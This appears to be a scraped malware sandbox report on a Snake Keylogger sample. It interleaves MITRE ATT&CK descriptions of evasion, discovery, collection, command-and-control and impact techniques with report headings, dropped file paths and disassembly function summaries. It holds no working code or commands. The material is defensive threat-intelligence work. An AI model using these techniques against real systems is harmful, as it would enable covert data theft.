Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RmIYOfX0yO.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bixynguq.o5i.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hopjxfvq.ivg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u31yhsv3.izq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztzr0lr4.xmh.ps1

C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll

C:\Users\user\AppData\Local\Temp\nss6CC1.tmp

C:\Users\user\AppData\Local\magmaet\clenched\Fotografiapparat.Sku203

C:\Users\user\AppData\Local\magmaet\clenched\Frontoparietal.ruf

C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe

C:\Users\user\AppData\Local\magmaet\clenched\RmIYOfX0yO.exe:Zone.Identifier

C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg

C:\Users\user\AppData\Local\magmaet\clenched\aarsungens.bla

Windows Analysis Report
RmIYOfX0yO.exe

Function 004033B6 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Function 00405421 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 004061A5 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405974 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403D6F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004039CC Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre